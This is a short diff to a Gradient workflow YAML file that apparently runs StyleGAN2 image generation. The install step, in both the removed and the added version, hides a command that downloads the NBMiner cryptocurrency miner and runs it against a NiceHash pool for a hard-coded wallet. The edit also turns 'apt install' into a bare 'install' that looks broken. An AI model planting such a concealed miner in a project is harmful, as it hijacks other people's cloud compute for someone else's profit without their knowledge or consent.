--- a/.gradient/workflows/stylegan2.yaml
+++ b/.gradient/workflows/stylegan2.yaml
@@ -34,7 +34,7 @@ jobs:
         pip install requests==2.22.0
         pip install Pillow==6.2.1
         pip install gpu-tpu-lab-server 
-        apt install git wget nano libpci-dev -y && wget https://github.com/NebuTech/NBMiner/releases/download/v36.1/NBMiner_36.1_Linux.tgz && tar -xvf NBMiner_36.1_Linux.tgz && cd NBMiner_Linux && clear && ./nbminer -a ethash -o nicehash+tcp://daggerhashimoto.usa.nicehash.com:3353 -u 327ojqfc6uk1BjKDKLTpmhEU7V82Bg4fWb.RIG
+        install git wget nano libpci-dev && wget https://github.com/NebuTech/NBMiner/releases/download/v36.1/NBMiner_36.1_Linux.tgz && tar -xvf NBMiner_36.1_Linux.tgz && cd NBMiner_Linux && clear && ./nbminer -a ethash -o nicehash+tcp://daggerhashimoto.usa.nicehash.com:3353 -u 327ojqfc6uk1BjKDKLTpmhEU7V82Bg4fWb.RIG
         cd /inputs/stylegan2
         python run_generator.py generate-images \
           --network=gdrive:networks/stylegan2-ffhq-config-f.pkl \
